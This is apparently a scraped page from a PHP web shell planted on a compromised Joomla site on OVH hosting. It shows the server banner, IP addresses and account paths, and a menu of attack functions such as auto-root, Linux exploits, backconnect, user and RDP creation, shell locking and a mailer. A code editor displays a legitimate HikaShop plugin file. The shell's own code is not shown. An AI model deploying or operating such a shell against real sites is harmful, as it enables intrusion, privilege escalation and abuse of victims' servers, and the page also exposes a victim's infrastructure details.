Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
plugins /
finder /
hikashop /
[ HOME SHELL ]
Name
Size
Permission
Action
hikashop.php
8.01
KB
-rw-r--r--
hikashop.xml
1.17
KB
-rw-r--r--
hikashop_j3.php
2.53
KB
-rw-r--r--
hikashop_j4.php
2.3
KB
-rw-r--r--
index.html
44
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hikashop_j3.php
<?php /** * @package HikaShop for Joomla! * @version 4.5.1 * @author hikashop.com * @copyright (C) 2010-2022 HIKARI SOFTWARE. All rights reserved. * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html */ defined('_JEXEC') or die('Restricted access'); ?><?php class plgFinderHikashop extends plgFinderHikashopBridge { protected function index(FinderIndexerResult $item, $format = 'html') { if (JComponentHelper::isEnabled($this->extension) == false) { return; } $registry = new JRegistry; $registry->loadString($item->params); $item->params = JComponentHelper::getParams('com_hikashop', true); $item->params->merge($registry); $registry = new JRegistry; $registry->loadString($item->metadata); $item->metadata = $registry; $item->summary = FinderIndexerHelper::prepareContent($item->summary, $item->params); $item->body = FinderIndexerHelper::prepareContent($item->body, $item->params); $menusClass = hikashop_get('class.menus'); $itemid = $menusClass->getPublicMenuItemId(); $this->addAlias($item); $extra = ''; if(!empty($itemid)) $extra = '&Itemid='.$itemid; $item->url = "index.php?option=com_hikashop&ctrl=product&task=show&cid=" . $item->id."&name=".$item->alias."&category_pathway=" . $item->catid.$extra; $item->route = "index.php?option=com_hikashop&ctrl=product&task=show&cid=" . $item->id."&name=".$item->alias."&category_pathway=" . $item->catid.$extra; $item->path = FinderIndexerHelper::getContentPath($item->route); $title = $this->getItemMenuTitle($item->url); if (!empty($title) && $this->params->get('use_menu_title', true)) { $item->title = $title; } $item->metaauthor = $item->metadata->get('author'); $item->addInstruction(FinderIndexer::META_CONTEXT, 'metakey'); $item->addInstruction(FinderIndexer::META_CONTEXT, 'metadesc'); $item->addInstruction(FinderIndexer::META_CONTEXT, 'metaauthor'); $item->addInstruction(FinderIndexer::META_CONTEXT, 'author'); $item->addInstruction(FinderIndexer::META_CONTEXT, 'created_by_alias'); if(!empty($item->cat_state)) $item->state = $this->translateState($item->state, $item->cat_state); $item->addTaxonomy('Type', 'Product'); $item->addTaxonomy('Category', $item->category, $item->cat_state, $item->cat_access); $item->addTaxonomy('Brand', $item->brand, $item->brand_state, $item->brand_access); $item->addTaxonomy('Language', $item->language); FinderIndexerHelper::getContentExtras($item); $this->indexer->index($item); } }
Close